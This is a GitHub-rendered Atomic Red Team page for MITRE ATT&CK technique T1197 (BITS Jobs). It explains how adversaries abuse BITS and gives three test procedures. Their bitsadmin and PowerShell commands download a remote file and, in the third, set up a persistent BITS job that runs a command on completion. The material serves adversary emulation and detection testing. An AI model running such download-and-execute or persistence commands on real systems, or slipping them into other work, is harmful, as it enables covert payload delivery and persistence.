Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
CircleCI Atomic Red Team doc generator Generate docs from job=validate_atomics_generate_docs branch=master 29da400 May 6, 2019
2 contributors

Users who have contributed to this file

@MHaggis @caseysmithrc
87 lines (62 sloc) 4.48 KB

T1197 - BITS Jobs

Description from ATT&CK

Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through PowerShell (Citation: Microsoft BITS) and the BITSAdmin tool. (Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol. (Citation: CTU BITS Malware June 2016)

Atomic Tests


Atomic Test #1 - Download & Execute

This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload

Supported Platforms: Windows

Inputs

Name Description Type Default Value
remote_file Remote file to download url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
local_file Local file path to save downloaded file path C:\Windows\Temp\bitsadmin_flag.ps1

Run it with command_prompt!

bitsadmin.exe  /transfer /Download /priority Foreground #{remote_file} #{local_file}


Atomic Test #2 - Download & Execute via PowerShell BITS

This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell

Supported Platforms: Windows

Inputs

Name Description Type Default Value
remote_file Remote file to download url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
local_file Local file path to save downloaded file path C:\Windows\Temp\bitsadmin_flag.ps1

Run it with powershell!

Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}


Atomic Test #3 - Persist, Download, & Execute

This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.

Supported Platforms: Windows

Inputs

Name Description Type Default Value
bits_job_name Name of BITS job string AtomicBITS
remote_file Remote file to download url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
local_file Local file path to save downloaded file path C:\Windows\Temp\bitsadmin_flag.ps1
command_path Path of command to execute path C:\Windows\system32\notepad.exe
command_line Command line to execute string C:\Windows\Temp\bitsadmin_flag.ps1

Run it with command_prompt!

bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
bitsadmin.exe /complete AtomicBITS
bitsadmin.exe /resume #{bits_job_name}

You can’t perform that action at this time.